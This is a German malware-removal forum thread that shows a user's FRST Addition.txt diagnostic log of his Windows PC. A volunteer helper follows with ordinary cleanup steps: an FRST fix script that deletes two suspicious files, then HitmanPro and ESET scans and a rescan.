Mozilla Firefox 60.0.1 (x64 de) (HKLM\...\Mozilla Firefox 60.0.1 (x64 de)) (Version: 60.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.1 - Mozilla)
MTA:SA v1.5.5 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.5 - Multi Theft Auto)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 20.1.3 - OBS Project)
OpenOffice 4.1.5 (HKLM-x32\...\{F0C909D7-D643-4628-8C6A-94073139F0CE}) (Version: 4.15.9789 - Apache Software Foundation)
osu! (HKLM-x32\...\{5fae645a-e4b4-4541-a037-7e4aa9f3e40a}) (Version: latest - ppy Pty Ltd)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7233 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{DDA8E261-B96C-4D2B-887F-D8AF1D7EF361}) (Version: 4.0.4 - SystemaRev) Hidden
Spotify (HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Spotify) (Version: 1.0.80.474.gef6b503e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-17] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {48AFC486-010B-4B4D-87F2-9F7C7EDA12AF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {57F4CA92-38A7-4B47-8B28-13BE860412BD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {657B38A1-8903-4F90-8E4D-E9C7AEFDC6FC} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {B51F287F-670C-42C3-A480-43546148601C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {CBF07082-94D0-43DD-961D-5221CC36D495} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2018-02-01] ()
Task: {D74FFB45-80D0-40D0-B76B-3411A9AA73A2} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_171_Plugin.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {E3E11419-953A-4F4A-89E6-E6FE35B1A897} - System32\Tasks\ASUS\i-Setup161131 => C:\Windows\MEI\AsusSetup.exe [2013-08-22] (ASUSTeK Computer Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2018-01-02 17:05 - 2014-01-28 05:16 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2017-07-25 13:25 - 2017-07-25 13:25 - 000015360 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.DLL
2017-07-25 13:25 - 2017-07-25 13:25 - 002519040 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000077824 _____ () C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000144896 _____ () C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-05-31 16:22 - 2018-04-30 12:54 - 002493648 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2018-05-31 16:22 - 2018-04-25 13:16 - 002297040 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-01-02 17:05 - 2018-06-01 13:48 - 000033280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2018-01-02 17:05 - 2014-01-28 05:16 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
2017-12-17 22:06 - 2017-12-17 22:06 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2018-01-02 19:30 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 002632480 _____ () C:\Program Files (x86)\Steam\video.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 000979232 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-01-02 19:30 - 2016-07-05 00:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-01-02 19:31 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-01-02 19:30 - 2015-09-25 01:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2018-06-01 10:33 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{284F86A9-4949-46F6-840F-D9148097BBD8}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{85AAA64D-BA95-4ABA-953F-93C00E3E6517}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{38372B69-909A-4837-B578-1427AF6188DE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BFC5EDA7-E306-4F45-9E50-132846C92DC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E6B568AE-25D3-4F67-8DA6-0E604EE731CB}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{045D9623-D16C-4CB2-9948-77484A2DE523}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{D2EDD83C-3FCB-4D45-B08D-5FD68B2D68C2}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [UDP Query User{0D7AD0CD-0224-44CB-A0C6-0D1EB37709E3}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe

==================== Wiederherstellungspunkte =========================

01-06-2018 00:17:39 Geplanter Prüfpunkt

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/01/2018 01:48:55 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (06/01/2018 01:37:46 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (06/01/2018 01:33:38 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (06/01/2018 10:37:17 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 09:30:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: AsusSetup.exe, Version: 2.0.20.2, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0x00000000
Fehleroffset: 0x00000000
ID des fehlerhaften Prozesses: 0x7b0
Startzeit der fehlerhaften Anwendung: 0x01d3f915e0c98213
Pfad der fehlerhaften Anwendung: C:\Windows\MEI\AsusSetup.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 20bf9f77-6509-11e8-bc5e-10c37b6f5940

Error: (05/31/2018 09:30:48 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:28:49 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:18:19 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.


Systemfehler:
=============
Error: (06/01/2018 01:51:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Intel(R) Management and Security Application Local Management Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (06/01/2018 01:48:56 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
 und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
 gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.

Error: (06/01/2018 01:48:56 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
 und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
 gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.

Error: (06/01/2018 01:47:59 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
 und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
 gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.

Error: (06/01/2018 01:47:59 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen (Anwendungsspezifisch) wird der SID (S-1-5-19) für Benutzer NT-AUTORITÄT\LOKALER DIENST von Adresse LocalHost (unter Verwendung von LRPC) keine Berechtigung zum Start (Lokal) für die COM-Serveranwendung mit CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
 und APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
 gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungsprogramm für Komponentendienste geändert werden.

Error: (06/01/2018 01:47:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (06/01/2018 01:47:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (06/01/2018 01:47:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Logitech Gaming Registry Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


CodeIntegrity:
===================================

Date: 2018-06-01 13:49:13.362
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 13:38:03.847
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 13:33:43.937
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 12:35:59.910
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 10:53:34.325
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 10:37:35.824
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 09:52:51.030
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-31 21:31:05.188
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 32%
Installierter physikalischer RAM: 8132.21 MB
Verfügbarer physikalischer RAM: 5515.98 MB
Summe virtueller Speicher: 16262.6 MB
Verfügbarer virtueller Speicher: 12450.11 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:778.8 GB) NTFS

\\?\Volume{c6be1ac3-efc6-11e7-8a05-806e6f6e6963}\ (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E8A87806)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

moinbro 01.06.2018 13:12
FRST ist wie immer im anhang ^^.

M-K-D-B 01.06.2018 19:58
Servus,



wir entfernen noch ein bisschen was und kontrollieren nochmal alles.



Hinweis: Der Suchlauf mit ESET kann länger dauern.





Schritt 1
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    C:\Users\Nico\Downloads\pmhcrnajslxdqlyjin.txt
    C:\myexe.exe
    EmptyTemp:
    End::
  • Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
Downloade dir die passende Version von HitmanPro auf deinen Desktop: HitmanPro - 32 Bit | HitmanPro - 64 Bit.
  • Starte die HitmanPro.exe
  • Klicke auf
  • Entferne den Haken bei
  • Klicke auf
    und
  • Akzeptiere die Lizenzbedingungen und klicke auf
  • Klicke auf

    und auf
  • Wenn der Scan beendet wurde, nichts löschen lassen etc. sondern wähle unten links auf der Button-Leiste
    und speichere die Logdatei auf Deinem Desktop.
  • Schließe HitmanPro und poste mir das Log.

 







Schritt 3
Downloade Dir bitte ESET Online Scanner (Bebilderte Anleitung)
  • Starte die Installationsdatei.
  • Akzeptiere die Nutzungsbedingungen.
  • Wähle Erkennung evtl. unerwünschter Anwendungen aktivieren aus und klicke auf Scannen.
  • Zuerst werden die notwendigen Signaturen heruntergeladen, anschließend startet ESET automatisch den Suchlauf.
  • Am Ende des Suchlaufs werden gegebenenfalls die gefundenen Elemente aufgelistet.
  • Wähle In Textdatei speichern... aus und speichere die Datei als eset.txt auf deinem Desktop ab.
  • Füge den Inhalt der eset.txt mit deiner nächsten Antwort hinzu.
  • Sollte ESET nichts finden, so kann auch keine Logdatei erstellt werden. Teile uns das dann unbedingt mit.
  • Schließe den ESET Online Scanner rechts oben [ X ] und klicke anschließend auf Schließen.





Schritt 4
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.







http://www.trojaner-board.de/extra/lesestoff.pngGibt es jetzt noch Probleme mit dem PC oder mit deinen Internet Browsern? Wenn ja, welche?







Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von HitmanPro,
  • die Logdatei von ESET,
  • die beiden neuen Logdateien von FRST,
  • die Beantwortung der gestellten Fragen.

M-K-D-B 04.06.2018 21:05
Fehlende Rückmeldung
Dieses Thema wurde aus den Abos gelöscht. Somit bekomme ich keine Benachrichtigung über neue Antworten.
PM inklusive Link zum Thema an mich falls du denoch weiter machen willst.

Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist.

Jeder andere bitte hier klicken und einen eigenen Thread erstellen!


Alle Zeitangaben in WEZ +1. Es ist jetzt 16:44 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130